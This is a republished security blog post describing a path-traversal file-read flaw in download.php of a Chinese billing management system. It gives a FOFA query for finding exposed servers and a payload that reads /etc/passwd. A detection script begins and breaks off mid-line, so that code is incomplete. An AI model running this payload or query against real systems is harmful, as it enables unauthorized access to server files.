Arbitrary file reading vulnerability in a billing management system - Code World

Arbitrary file reading vulnerability in a billing management system

Mobile 2023-10-07 04:07:06 views: null

Article directory

statement
1. Vulnerability description
2. Recurrence of vulnerabilities

statement

Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user himself. All adverse consequences and The author of the article is irrelevant. This article is for educational purposes only.

1. Vulnerability description

There is an arbitrary file reading vulnerability in the Blue Ocean Excellent Accounting Management System download.phpfile. An attacker can read sensitive files on the server by traversing the .../ directory.

2. Recurrence of vulnerabilities

Vulnerability keyword search
FOFA: title =="蓝海卓越计费管理系统"
Insert image description here
Vulnerability location: download.php?file=../../../../../etc/passwd

Script detection

# -*- coding: utf-8 -*-

import argparse
import sys
import requests
from multiprocessing.dummy import Pool  # 表示的是多线程

reque

Guess you like

Origin blog.csdn.net/weixin_46944519/article/details/132846113

Arbitrary file reading vulnerability in a billing management system

Analysis of arbitrary file reading vulnerability in a micro e-office collaborative management system CNVD-2022-07603

Arbitrary file reading and vulnerability reproduction

Reproduce the arbitrary file reading vulnerability of UFIDA CRM system

There is an arbitrary file reading vulnerability in the Aikesi application access system

A micro-e-office collaborative management system has an arbitrary file reading vulnerability that reappears CNVD-2022-07603

Vulnerability recurrence - arbitrary file reading exists in a certain interface of a friend's CRM system (with vulnerability detection script attached)

There is an arbitrary file reading vulnerability in Lanling OA

There is an arbitrary file reading vulnerability in zeroshell firewall

CVE-2020-8209 (Citrix Endpoint Management) XenMobile-Console has arbitrary file reading vulnerability

CTI Monitoring and Early Warning System 2.2 has an arbitrary file reading vulnerability

The Basic Vulnerability of the Web--An Arbitrary File Reading and Downloading Vulnerability

UF Mobile Management System Arbitrary File Upload Vulnerability Reappearance (HW0day)

Vulnerability of arbitrary file upload in Yisaitong electronic document security management system reappears

UFIDA Mobile Management System Arbitrary File Upload Vulnerability [2023-HW]

Lanproxy arbitrary file reading vulnerability CVE-2021-3019 reproduces

ThinkAdmin arbitrary file reading vulnerability (CVE-2020-25540)

Arbitrary file reading vulnerability in Tingzhi Technology VA virtual application platform

Vulnerability of reading arbitrary files in NSFOCUS sas security audit system

Vulnerability Recurrence-Yisaitong arbitrary file reading vulnerability (with vulnerability detection script)

Vulnerability recurrence - there is an arbitrary file reading vulnerability in the iDocview doc/upload interface (vulnerability detection script attached)

Vulnerability recurrence-milesight vpn arbitrary file reading vulnerability (with vulnerability detection script)

Arbitrary File Download Vulnerability

There is an arbitrary file upload vulnerability in the comprehensive management platform of Dahua Smart Park

Vulnerability recurrence - Zhejiang University Ent customer resource management system CustomerAction.entphone; .js interface arbitrary file upload vulnerability (with vulnerability detection script)

There is an arbitrary file download vulnerability in the AVCON6 system management platform of Warburg Pincus Information Technology Co., Ltd.

Hikvision iVMS integrated security system arbitrary file upload vulnerability reappears

[Vulnerability Recurrence] There is a recurrence of arbitrary file reading vulnerability in Panwei e-office OfficeServer2.php

Arbitrary file upload vulnerability (introduction)

Actual Combat - Blue Ocean Excellence Billing Management System debug.php Remote Command Execution Vulnerability

Recommended

Ranking

ACCESS Group leads the trend of health, scarce raw materials and leading technology help brands ride the wind and waves in the big health industry

500 threads operate int objects at the same time [java multi-thread shared variable]

アートテンプレートレンダリングの基本構文

Vue sends asynchronous request

Ubuntu vs code next update

Description of classes and objects

780. Reaching the End: Number Theory Reasoning and Analysis Questions

OpenCV (image processing) - based on python-filter (how to use low-pass and high-pass filters)

FFmpeg learning (4) - Embed subtitles to the video

The calc( ) property in CSS3

Daily

More

2024-07-26(0)

2024-07-25(0)

2024-07-24(0)

2024-07-23(0)

2024-07-22(0)

2024-07-21(0)

2024-07-20(0)

2024-07-19(0)

2024-07-18(0)

2024-07-17(0)